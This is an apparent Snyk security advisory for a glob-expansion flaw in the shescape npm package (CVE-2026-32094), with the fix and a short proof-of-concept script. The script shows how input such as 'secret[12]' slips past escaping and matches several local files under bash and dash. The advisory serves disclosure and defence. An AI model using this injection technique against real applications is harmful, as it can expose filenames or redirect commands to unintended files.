Improper Encoding or Escaping of Output Affecting shescape package, versions <2.1.10
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Improper Encoding or Escaping of Output vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-JS-SHESCAPE-15467452
- published12 Mar 2026
- disclosed11 Mar 2026
- creditanyzy2003
Introduced: 11 Mar 2026
NewCVE-2026-32094 (opens in a new tab)How to fix?
Upgrade shescape to version 2.1.10 or higher.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in the escape function. An attacker can cause unintended expansion of shell arguments by supplying input containing square brackets, which may result in multiple filesystem matches being processed instead of a single literal argument. This can lead to changes in command behavior, targeting of unintended files, or exposure of filenames when the output is used in shell commands.
PoC
tmp=$(mktemp -d)
cd "$tmp"
npm pack shescape@2.1.9 >/dev/null
mkdir pkg
tar -xzf shescape-2.1.9.tgz -C pkg
cd pkg/package
npm install --omit=dev
node --input-type=module - <<'NODE'
import { mkdtempSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import path from "node:path";
import { execSync } from "node:child_process";
import { Shescape } from "./src/index.js";
const dir = mkdtempSync(path.join(tmpdir(), "shescape-ghsa-poc-"));
writeFileSync(path.join(dir, "secret1"), "");
writeFileSync(path.join(dir, "secret2"), "");
for (const shell of ["/usr/bin/bash", "/usr/bin/dash"]) {
const shescape = new Shescape({ shell });
const escaped = shescape.escape("secret[12]");
console.log(${shell} escaped=${escaped});
const out = execSync(printf '<%s>\\n' ${escaped}, { cwd: dir, shell }).toString();
process.stdout.write(out);
}
NODE